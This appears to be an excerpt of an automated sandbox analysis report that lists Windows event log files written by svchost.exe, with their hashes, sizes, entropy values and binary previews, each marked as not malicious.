                                                SHA-256:551565214FC62778716C39CDD16E4D60D0F45410459DA67A4DF2E4CB1EA6B1E9
                                                SHA-512:E6C231FAEE2A4F76FCAF61993450FB26AB834E6F3B50A06C6498801BFB7191A2998F7FBBC7BFCC06127484787CE905483D3752C7FDAAB76D01F5DCF939738A70
                                                Malicious:false
                                                Preview:ElfChnk.........................................x...X..{.....................................................................g.p................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................O.......................&..........................................................._...................**..@...........H...ZM..........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.7602204514023913
                                                Encrypted:false
                                                SSDEEP:384:ChP8o8Z85848V8M8g8D8R8E8J83W1d8b8ut8l8:CR
                                                MD5:A71D2A716E4B8C87379C50F91A376243
                                                SHA1:B55D17BCD95C285812D918E820EDC513B8BC4373
                                                SHA-256:4C279C417D131982DEF275E92EC2EB1CCF985E5A5785B8989D28972A72AAD650
                                                SHA-512:4759EE9F1D1DF7F9C3452A40C1A58C66A8928378CC69B464944C4732BC5042BE1FFA81996F5943702CF7379C632B41081F9109421EB9A2243CCF06AF02BC45E8
                                                Malicious:false
                                                Preview:ElfChnk.........................................8!..=.......................................................................w]..........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......v...............................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.7778192601657423
                                                Encrypted:false
                                                SSDEEP:1536:TXhCUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:TXQnS
                                                MD5:BC1869126DBA5DA294864FC0BC639FCA
                                                SHA1:021005C8E27BF6EAC1336EA1F1E76F31E3C1831F
                                                SHA-256:D90EE284FB6497E69E12A1E42F467572D4FF2192B58481A85F4468C1B46810D3
                                                SHA-512:E610240B9E07DF0386AF91F57B44DDA52847FC9A68AB80725D42A77BA8A583E6E8E4532394EC9C2C90AB3102B454F94F06DB1085944E60823A4CF8121FB8EA32
                                                Malicious:false
                                                Preview:ElfChnk.........*...............*...........(N...O...iD.......................................................................Lg................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........=......................................................O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.4655200384785823
                                                Encrypted:false
                                                SSDEEP:768:m0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O5vaP4eZiGai2niL9i5:ucE5
                                                MD5:EC1441AF347A3AEBD3C499EB77112044
                                                SHA1:062F0645AF0FF401308A0582362E6FE001C5444F
                                                SHA-256:97F7D6CF9603D2EF964F3D680F5902853382AE270ED6A37576364BD19E0A1C4A
                                                SHA-512:687D850AB0E8E4E75E484ED8E56658749F1331854AD6E28400538F050E3F372CA791023C87CE192D1417C70E63C0911E589AD9AE103CE30BB68A03EED414AABA
                                                Malicious:false
                                                Preview:ElfChnk.........@...............@............{..@}....c.....................................................................].................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&................................................b..........%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):88200
                                                Entropy (8bit):2.3098836212815925
                                                Encrypted:false
                                                SSDEEP:384:Hi8EdhNiwCrtrlXbaDQX/5pbiN5p6iN5yYXiN5pZiN5pIiN5pLiN5pZDiN5p+iNS:zEd6uEH6uEgh
                                                MD5:C17F7ECEC330DAB1DFE3DAA6AD3C44F7
                                                SHA1:F89E9E59D860DECD7E1FD054C13066BCF43E33DA
                                                SHA-256:C49D836EA0572D8D48F7FCBB8D92C4949E2B1BF44A009A4A4661519C26253601
                                                SHA-512:CA0B304C369BF5A7F8AADA07D5AD7CABFEAF74EA77BB264BE02EA01078DDB41E52DF33D2B3EE66CA07E6CA500F6E8C5CA489CCC1710FED46C516008B9C37F8E4
                                                Malicious:false
                                                Preview:ElfChnk.'.......1.......'.......1...........`L...N..........................................................................]z.4................^...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................7.......................&...............................................................................**..X...1........H..ZM..........E!&...............................................................L.......b.....!..................H..ZM.....`...V...`...p.......1....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^7...........j...........................................5.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.335307911754908
                                                Encrypted:false
                                                SSDEEP:384:NpQ/hDGCyCkCzCRCFCaC5ClCWQCyCiECLCtmWCTCYCflCdCEtC0C6gCwzChWCVJY:NpQ/dJjm6EIf8aG3e
                                                MD5:DEC13E419235D71E66C768AF61C819EB
                                                SHA1:C2601E3DF8A2D6E230D368CA0ECDD4BD11786D1A
                                                SHA-256:E9AAB8B817BC34F1B7009A6ABC439ACD1EFC991293198857268699458DF84552
                                                SHA-512:A78230EF0961E00D27B109F0EEF6DEDB9198759E1858C1DCB8C0E1032D48242C23726BB2931EE62A47A5C4D8434CD3BB537B0E6DF85D62653E3648A49A22AA3D
                                                Malicious:false
                                                Preview:ElfChnk.U...............U.............................w..................................................................... j..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................1[..............................&........>......................................y.......................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.470554172113501
                                                Encrypted:false
                                                SSDEEP:1536:J0dBaHTmPeG68WdEWx/Tm3vaA1YNNd/vTGMk1o4X7BOBrc3gkWqJfECYqzGDXbJm:J0razmmG/WCWlTYvn1ANxvqMYo4XdOBH
                                                MD5:7C2BA3824E6FDFDC9B34997831CF5BA4
                                                SHA1:2F75B2D7953CA1F3F139E66C1C1C785DC11F6F0B
                                                SHA-256:902EC3153154EDF682DF6D35860B9D42B3C6016F787D02E0CC1D2371F3997192
                                                SHA-512:4BC9FFCB38302D4764B8632EC360FFDE079EF9818F6128BE07F6E89671A510A32AC93145F3FDB4CDBD6363390EAB157D8B164C2B04B86A36C3B93A08AE7A6B52
                                                Malicious:false
                                                Preview:ElfChnk......................................h...i.....n....................................................................n.2.................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..8............C',_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.4692142843323
                                                Encrypted:false
                                                SSDEEP:1536:mj9GvEkeLhw6IrKOu4zB5c63VJ7qhFRbw7ZGnCg7HZANhlPqizIUxKu/GFy9pUJF:mj9GvEkeLhw6IrKOu4zB5c63VJ7qhFRp
                                                MD5:882EF5776EC85740D5E17E47907A8A5D
                                                SHA1:A9659F309F10AD27550CCCBC7A1E1FD815155CCE
                                                SHA-256:02675149F56F0D3D965AA88A8D02773CAE09162BF60C64BB850CE9F8DB9E2AD7
                                                SHA-512:22D3905002411E6802BF28AD44D0921EFD6E2C289739D37DAFB00DF4DF9FFCB79521D64E4AEC5E399B9988931FF36679995F566A1924E48BAC6FAF6998243DC0
                                                Malicious:false
                                                Preview:ElfChnk.........#...............#...............(...Ak......................................................................@.TC................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F...............................................................9...&...........................q.......I...................................Q.......**..............t...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.5283250731919766
                                                Encrypted:false
                                                SSDEEP:384:YeUThv707s7a7v7yP7c7V7u7C7Z7C7M7n7K7G7d7Yp7PC787h7H7l73+7L7L7j7s:YeUTRVb
                                                MD5:9CB77B06F0F33B4BC7A638085998A032
                                                SHA1:04C57BABBE0B49A1AF70143FD2D9ED9071A14D5C
                                                SHA-256:AC3F98137ECCA65B1C5EBDF80B02F693E51AEA05B0B033CCB9A91C68778FF751
                                                SHA-512:488788029BCCEA4A3D2C8ED7492D895469BE0962884BC868F080E9CB479AF7ECDAF46E17FC08C9912B953E614E9DEE673DF994170931A99D9E28248117C6F4F8
                                                Malicious:false
                                                Preview:ElfChnk.....................................0y...{.._N......................................................................%.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................-@..............E9..m...................&.......................................................->......................**..8...........D...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.268440759929627
                                                Encrypted:false
                                                SSDEEP:384:whc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinJ:w6Ovc0S5UyEeDgLvqSX79K
                                                MD5:3E6903B4F529505011694E65B60A9154
                                                SHA1:05BC372041FD161154C35F843BFE439066F3A6C6
                                                SHA-256:E7BB68D43D88025FC2EC47BCA4957A08CEDF53FAA24751D95019CEF867223393
                                                SHA-512:8C700C45A3A01A79F9E0AB74BE5C0E718E231AAD4395F631A3DADA5C83E937EEBD0804DB0AF340A341440414ACD9293713B9ECB1A074F5E794CA21DFAB8D8CA0
                                                Malicious:false
                                                Preview:ElfChnk.........?...............?............q...s..>O......................................................................C.*.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6^..............................................w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8178355996317889
                                                Encrypted:false
                                                SSDEEP:384:HhGuZumutu4uEu5uOuDuyb2uPu1uuuCeuDu7utu:HD
                                                MD5:FFB7825ACA321A39E4DD495EC4B7E3BE
                                                SHA1:A4EBE4617E4B98D93FDE5546893A4D29441B5F44
                                                SHA-256:F56C28857B0E8D30F34089306B9CCF6655F7ED073412E710AB10D747092DA0D2
                                                SHA-512:86D7C252C870B9362394CFA35B99AE257228E477A5346D8EF5B91E81F3A78CD008DC52A5F3D12C395EFB715F82B849CAD805AD71CF8C58514614F83EACB4F63E
                                                Malicious:false
                                                Preview:ElfChnk......................................"...$....u.....................................................................v..C................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......>...............................................................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.075909180265887
                                                Encrypted:false
                                                SSDEEP:384:NhzAsAvAaAmANSAbNAQAfCHA+AHchArAXATAvAjALATABAtGABS78jAOAqA4eAEp:NGCs2k64i/tpqA
                                                MD5:3A282029B03747ACB9F0A3496C717BD9
                                                SHA1:705490A345F883E024CC1641981A90DA6EDADCF5
                                                SHA-256:2A94A3FFC2481031F58367AB9F99D7972299D7F537520D2A6318B1BAA6B158F8
                                                SHA-512:F98AEB35B035B10B5C3CCA876E445D502AD84F66BE857B17EFE715983F9834ECAEDCCE5FF03914853115DE1644E9541FF111BD79A3607FA707735546A0C04AD4
                                                Malicious:false
                                                Preview:ElfChnk.....................................H.......}{........................................................................dE................<.......................d...=...........................................................................................................................f...............?...........................m...................M...F............................+.......................%..............&...............................................................................**..............|..3_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.162414582102809
                                                Encrypted:false
                                                SSDEEP:384:khVpW2pPkpPrpPepP1pP4pPHpPypPxpPYpPDpPypPlpPct1pPnpPsLpPAWpPQpPT:k+tZb
                                                MD5:0D76B94CB673E07C9297775F6635BB30
                                                SHA1:42037C8D133B4CD395BA6BDC1108C30882248866
                                                SHA-256:7133E41E960AD5F46294DCBDC3FFE8CFCFD120213DF680017947924D3C013A8B
                                                SHA-512:9E5D104332631EDBCB8AF55BCEA2CD7B7EB34A0FE1DF226579E005A775840CDF05C86CCBEF902730138ED1A27347B4FB070FAF37046320740009CC11BAC11C33
                                                Malicious:false
                                                Preview:ElfChnk.........'...............'...................u..4.................................................................... ...........................................B...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**...............h{.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.217583590897775
                                                Encrypted:false
                                                SSDEEP:384:3hUIpGcRpDvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBD:3YDoh1VLBCVz6t0o3ZeF9UBlG
                                                MD5:C5BB06A11AA8E33C5D2512146A14F414
                                                SHA1:BCA1D0ABD07806B4DDB34B4483B04B57A840CC26
                                                SHA-256:5A42653C87D73E415D15B08AE3511312F991238224022920D85CDEE43316C64A
                                                SHA-512:8FE28DAC0CEB3BBB462390492FA7623077448CCD58E04EE38C6CE9FF92FAD6647176DD61A628A4C03C3C5DEE9912D67375AE77865DE52D23B2B253C01C43FC86
                                                Malicious:false
                                                Preview:ElfChnk.........................................P......a.................................................................... ..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..............T.0.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.1666137709834492
                                                Encrypted:false
                                                SSDEEP:384:uwhwCCRzCaCkClCzCYC/CyCVCGCMCvCzCw9CdqCVCICsC:uwKFT
                                                MD5:88E290384531AC91E63C802B158E726D
                                                SHA1:2AFD218C14B290A33DC27B0BDBA87AADFD428D9B
                                                SHA-256:36B48D00709B0F3B917927DE97D395C4785F6A7B61CCC5C72C799C4521FD9D97
                                                SHA-512:7969E4BDC2659D8412FD187135AB04B329AE134E2A5E386D86BA0E490F979621DCE05DF1118FA31987CB5FD27CB964773F4A67D6884002F7E9579A752E5A2AAD
                                                Malicious:false
                                                Preview:ElfChnk.....................................84..p6..........................................................................Pl..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................v)........................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):94816
                                                Entropy (8bit):4.689148126102424
                                                Encrypted:false
                                                SSDEEP:768:4uqAyyAy4QtGRAyumjXAywtLVuqAyyAy4QtGRAyFdUV:d4Qdjq4QSdK
                                                MD5:0CA3CD26D58E2470AC042BC775DF3728
                                                SHA1:DE049F60D03ABC2FA68ABE02C76030597B14AC14
                                                SHA-256:6D075BEC834EE48ADD53D8152E84574D77DFE621C3771FEB25881E726AAE356F
                                                SHA-512:A7972421B4CA8E3305A2911511CBF15832C0D266D5FFF1DCBA6E395CB27A6F1259C14159F5EB7E836F9B372127180199B9AE3052C698A2D73508FF05F788D046
                                                Malicious:false
                                                Preview:ElfChnk..3.......3.......3.......3...........L...O..s..................................................................................................................<...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........................M...................................................**.......3.......S..ZM..........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                                Category:dropped
                                                Size (bytes):79024
                                                Entropy (8bit):1.824304466615825
                                                Encrypted:false
                                                SSDEEP:384:yFhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmIUmxjUmLUmNUphL6UsE0ZUV:2Y7LR4Y7LR
                                                MD5:B9D17E91081C183655469CCB37BC6241
                                                SHA1:4DF3824B189BAA832D075FBB9C3F5E3D0A0F3086
                                                SHA-256:2EEE5EE50E29361164735B22F95FCDC6CD57B5FA8F57245375C7DD3F363B5057
                                                SHA-512:18213E725E38C2FC4356E17AFDCCA99D299FA618FCBB90EE90433128203043D22AD3E72C9868327A69EE8CB173BF898EE8360703941CFADC0F5722FBF7037398
                                                Malicious:false
                                                Preview:ElfFile.....................................................................................................................\>.eElfChnk......................................1..04.....h........................................................................................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................*..............................................................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.20421823963440697
                                                Encrypted:false
                                                SSDEEP:48:MxAWurP+yQNRBEZWTENO4bhBkcoP/6zk:UNVaO8McoP/6zk
                                                MD5:4F34FFD0A10F87B4BC8B0274329610DC
                                                SHA1:3B087FF2885005FA5AB3119FE6FDB3322ADA6D25
                                                SHA-256:9AB99808207007F63C90DF3F9DC54C3DDCBA7F538FE5B58BEA8E58BD0E0BC157
                                                SHA-512:3432CD3F6091C787EF5264E24FE587AAE1916952B8750942EAE2AC9C84428AB71C123AFE0E9C0657EDC304AE736CA5D3546DFA17BBAF90CC92ABD52C3094BAB0
                                                Malicious:false
                                                Preview:ElfChnk.............................................~r........................................................................_................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**.................4a...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.0934111022900845
                                                Encrypted:false
                                                SSDEEP:384:phjivnniDiiuXieuietio0i7riTKhiIViOhin5ibaifiWipiUiKijiTVijiHiBRY:pon6ufC/hCI4MWs8PM9QSp
                                                MD5:C03DC232AFCDF6316B6CC7D1D5266423
                                                SHA1:8B90D640BB1B09E8C61117DE6B00B93CB1FE69A0
                                                SHA-256:198FDBBBC7444C323E7DBFB5B6D5B6AB870587FE7B740A05C22C6821B0508D16
                                                SHA-512:192E77738FC7A6493DFA22C5A56EA01E4A502219756578AE772C4FB0A1074617A21523D1029C6C9DDF15798D0968A0C14C8B723EAB0B91BD01F9967540C04DE9
                                                Malicious:false
                                                Preview:ElfChnk.y...............y....................x...z..D.......................................................................Hu...................#..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F....................................................................@...................#..................................w#.......'..............**......y........`0.Y...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):72472
                                                Entropy (8bit):2.439060786996042
                                                Encrypted:false
                                                SSDEEP:384:Vpb5pgipPpQfjpYpK4p6ip8Ghecp/PpohCpPpaLpypDpWpywp7pdKpApWZqhpaed:ANRTgshamoZqP+INFanNRT
                                                MD5:36BB122FDE2A083A8B7C9B7A12C596F1
                                                SHA1:0E4E214E475BD43F12913BC2D11C1E8687DE704B
                                                SHA-256:3C80C7CA594DF84263FF62667BB0BBBAB5163CBB0742969E8D153CB96430A09F
                                                SHA-512:164E55D733816702DC4AF5CACF1E60279BC6FBE8C33558EF6B4BA97BC7E0C21C5A776377F0E1E23D22AB3A12318318C116526B04A67559D63C481901D4F7CA1C
                                                Malicious:false
                                                Preview:ElfChnk......................................r...t..*.&Q.....................................................................B..................6...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................y...........&........0...........%..........................a!..........!F..........................**..............%!..ZM..........E!.0..............................................................<.......T...A.!................@%!..ZM.....`...."..`...h...x........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.T.i.m.e.-.S.e.r.v.i.c.e.......SN.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.T.i.m.e.-.S.e.r.v.i.c.e./.O.p.e.r.a.t.i.o.n.a.l....%.....................................................F..............**..x..............ZM..........E!.0....................................
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.3919409988581557
                                                Encrypted:false
                                                SSDEEP:768:SiasFkawaTakafalaxaUasa/amadaiawaDa3ajaXavaDaLavabaTaLaTa7aTavaT:vF
                                                MD5:E8DFBF8E4A0A3BE1855F63BB88FEA9B4
